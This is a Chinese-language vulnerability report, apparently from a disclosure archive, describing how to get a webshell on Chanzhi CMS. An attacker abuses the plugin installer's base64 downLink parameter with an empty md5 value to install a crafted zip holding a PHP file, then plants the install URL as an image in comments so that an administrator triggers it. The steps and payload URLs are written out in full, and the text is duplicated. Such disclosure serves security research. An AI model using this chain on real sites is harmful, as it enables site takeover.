### 简要描述:
get提交某个url即可getshell
### 详细说明:
http://localhost/www/admin.php?m=package&f=obtain 在安装插件的地方 我们随便找个插件安装 先点击“自动安装” 会出来个提示框有个“我同意授权”的按钮 对着按钮右键复制他提交的URL
```
http://localhost/www/admin.php?m=package&f=install&package=hellochanzhi&downLink=aHR0cDovL3d3dy5jaGFuemhpLm9yZy9leHRlbnNpb24tYnV5RXh0LTEtZG93bmxvYWQuaHRtbA==&md5=093632e563a4911d6f26d3c876aaf4dc&type=extension&overridePackage=no&ignoreCompatible=yes&overrideFile=no&agreeLicense=yes&upgrade=no
```
通过这个URL get提交即可安装该插件 看看downLink参数的值
```
aHR0cDovL3d3dy5jaGFuemhpLm9yZy9leHRlbnNpb24tYnV5RXh0LTEtZG93bmxvYWQuaHRtbA==
```
明显的是base64 给他解密一下 http://www.chanzhi.org/extension-buyExt-1-download.html 打开这个URL就会弹出下载。 于是我下载下来看了看结构然后删减删减 首先先新建一个名为"isTop"(随意)的文件夹 在里面再建个名为"www"的文件夹 接着再www文件夹下建立个template文件夹 template文件夹里建立一个index.php 最后对isTop压缩 放到某个网站里 于是我构造出了如下URL
```
http://localhost/www/admin.php?m=package&f=install&package=aaa&downLink=aHR0cDovL2xvY2FsaG9zdC9zYi56aXA=&md5=&type=extension&overridePackage=no&ignoreCompatible=yes&overrideFile=no&agreeLicense=yes&upgrade=no
```
不需要对参数md5赋值 我的下载链接解密后是 http://localhost/sb.zip 然后开始GET提交这个URL
[<img src="https://images.seebug.org/upload/201502/221615069d9d6dd65d61e1808d74b1b1b0375f86.png" alt="搜狗截图15年02月22日1558_1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201502/221615069d9d6dd65d61e1808d74b1b1b0375f86.png)
提交后会先给他下载到\system\tmp\package\ 目录 然后再进行解压 接着我们根据压缩出来的路径访问index.php文件
[<img src="https://images.seebug.org/upload/201502/2216162751407a2e01e491d756509187c73712f7.png" alt="搜狗截图15年02月22日1603_3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201502/2216162751407a2e01e491d756509187c73712f7.png)
找个可以和管理员互交的地方 比如留言 评论等地方 插入一个图片 URL为刚才的payload
### 漏洞证明:
http://localhost/www/admin.php?m=package&f=obtain 在安装插件的地方 我们随便找个插件安装 先点击“自动安装” 会出来个提示框有个“我同意授权”的按钮 对着按钮右键复制他提交的URL
```
http://localhost/www/admin.php?m=package&f=install&package=hellochanzhi&downLink=aHR0cDovL3d3dy5jaGFuemhpLm9yZy9leHRlbnNpb24tYnV5RXh0LTEtZG93bmxvYWQuaHRtbA==&md5=093632e563a4911d6f26d3c876aaf4dc&type=extension&overridePackage=no&ignoreCompatible=yes&overrideFile=no&agreeLicense=yes&upgrade=no
```
通过这个URL get提交即可安装该插件 看看downLink参数的值
```
aHR0cDovL3d3dy5jaGFuemhpLm9yZy9leHRlbnNpb24tYnV5RXh0LTEtZG93bmxvYWQuaHRtbA==
```
明显的是base64 给他解密一下 http://www.chanzhi.org/extension-buyExt-1-download.html 打开这个URL就会弹出下载。 于是我下载下来看了看结构然后删减删减 首先先新建一个名为"isTop"(随意)的文件夹 在里面再建个名为"www"的文件夹 接着再www文件夹下建立个template文件夹 template文件夹里建立一个index.php 最后对isTop压缩 放到某个网站里 于是我构造出了如下URL
```
http://localhost/www/admin.php?m=package&f=install&package=aaa&downLink=aHR0cDovL2xvY2FsaG9zdC9zYi56aXA=&md5=&type=extension&overridePackage=no&ignoreCompatible=yes&overrideFile=no&agreeLicense=yes&upgrade=no
```
不需要对参数md5赋值 我的下载链接解密后是 http://localhost/sb.zip 然后开始GET提交这个URL
[<img src="https://images.seebug.org/upload/201502/221615069d9d6dd65d61e1808d74b1b1b0375f86.png" alt="搜狗截图15年02月22日1558_1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201502/221615069d9d6dd65d61e1808d74b1b1b0375f86.png)
提交后会先给他下载到\system\tmp\package\ 目录 然后再进行解压 接着我们根据压缩出来的路径访问index.php文件
[<img src="https://images.seebug.org/upload/201502/2216162751407a2e01e491d756509187c73712f7.png" alt="搜狗截图15年02月22日1603_3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201502/2216162751407a2e01e491d756509187c73712f7.png)
找个可以和管理员互交的地方 比如留言 评论等地方 插入一个图片 URL为刚才的payload
京公网安备 11010502034610号
暂无评论